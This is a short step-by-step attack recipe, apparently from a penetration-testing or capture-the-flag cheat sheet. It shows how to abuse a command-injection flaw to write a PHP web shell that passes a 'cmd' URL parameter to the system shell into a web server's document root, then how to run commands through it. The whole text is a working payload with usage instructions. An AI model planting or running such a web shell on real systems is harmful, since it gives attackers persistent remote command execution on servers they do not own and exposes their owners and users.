1. First get the current directory: pwd

2. Inject the following based on path from above (URL encode if needed): echo+"<pre><?php+passthru(\$_GET['cmd']);+?></pre>"+>+/var/www/html/webshell.php

3. Use http://ip/webshell.php?cmd=ls (cmd parameter) to execute command.